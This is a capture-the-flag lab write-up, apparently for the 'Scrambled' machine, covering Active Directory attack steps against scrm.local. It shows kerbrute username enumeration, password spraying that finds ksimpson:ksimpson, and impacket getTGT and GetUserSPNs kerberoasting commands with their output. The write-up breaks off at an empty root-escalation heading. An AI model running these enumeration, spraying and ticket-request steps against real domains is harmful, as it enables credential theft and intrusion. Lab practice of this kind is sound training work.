Scrambled

MediumMachineMar 13, 2026
#nmap#kerberos#kerbrute#getTGT#impacket#GetUserSPNs#impact

Scrambled

Domain: scrm.local

nmap

80 Http

Pasted image 20220825061048.png

Pasted image 20220825063110.png Maybe we can find a user who hasn't reset their password yet

Username Pasted image 20220825064251.png

Internal app Pasted image 20220825063157.png

88

kerberos kerbrute

Finding usernames

./kerbrute_linux_amd64 userenum --dc dc1.scrm.local -d scrm.local /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt

   __             __               __        
  / /_____  _____/ /_  _______  __/ /____    
 / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \  
/ ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/  
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                           
  
Version: dev (9cfb81e) - 08/25/22 - Ronnie Flathers @ropnop  
  
2022/08/25 06:27:47 >  Using KDC(s):  
2022/08/25 06:27:47 >   dc1.scrm.local:88  
  
2022/08/25 06:27:57 >  [+] VALID USERNAME:       administrator@scrm.local  
2022/08/25 06:28:25 >  [+] VALID USERNAME:       asmith@scrm.local  
2022/08/25 06:29:04 >  [+] VALID USERNAME:       Administrator@scrm.local
2022/08/25 06:29:34 >  [+] VALID USERNAME:       jhall@scrm.local
2022/08/25 06:33:17 >  [+] VALID USERNAME:       sjenkins@scrm.local  
2022/08/25 06:33:46 >  [+] VALID USERNAME:       khicks@scrm.local  
2022/08/25 06:38:19 >  [+] VALID USERNAME:       Asmith@scrm.local

This wasn't helpful in the long run but gave me a list of users to work with, along with the ksimpson name from earlier

Let's password spray them each with their own username, and we see that we get a valid match for ksimpson:ksimpson

./kerbrute_linux_amd64  passwordspray -d scrm.local --dc dc1.scrm.local ../../../scrambled/users.txt ksimpson
   __             __               __        
  / /_____  _____/ /_  _______  __/ /____    
 / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \  
/ ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/  
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                           
  
Version: dev (9cfb81e) - 08/25/22 - Ronnie Flathers @ropnop  
  
2022/08/25 06:44:56 >  Using KDC(s):  
2022/08/25 06:44:56 >   dc1.scrm.local:88  
  
2022/08/25 06:44:56 >  [+] VALID LOGIN:  ksimpson@scrm.local:ksimpson  
2022/08/25 06:44:56 >  Done! Tested 8 logins (1 successes) in 0.292 seconds

135 RPC

139/445 Netbios/smb

389 LDAP Domain: scrm.local

464 kpasswd

593 RPC over HTTP

636 LDAP

Foothold

getTGT impacket Found working username:password of ksimpson:ksimpson lets get a ticket

┌[blackBox]─[06:48-25/08]─[/home/parsec/htb/tools/kerbrute/dist]  
└╼parsec$getTGT.py scrm.local/ksimpson:ksimpson -dc-ip scrm.local  
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation  
  
[*] Saving ticket in ksimpson.ccache

Let's export that so the impacket tools can utilize it export KRB5CCNAME=ksimpson.ccache Now we should be able to authenticate properly with this TGT. Let's try to search for Service Accounts/SPN for some keys GetUserSPNs impact

GetUserSPNs.py -request scrm.local/ksimpson -k -no-pass -dc-ip dc1.scrm.local

Root Escalation

SharedResolute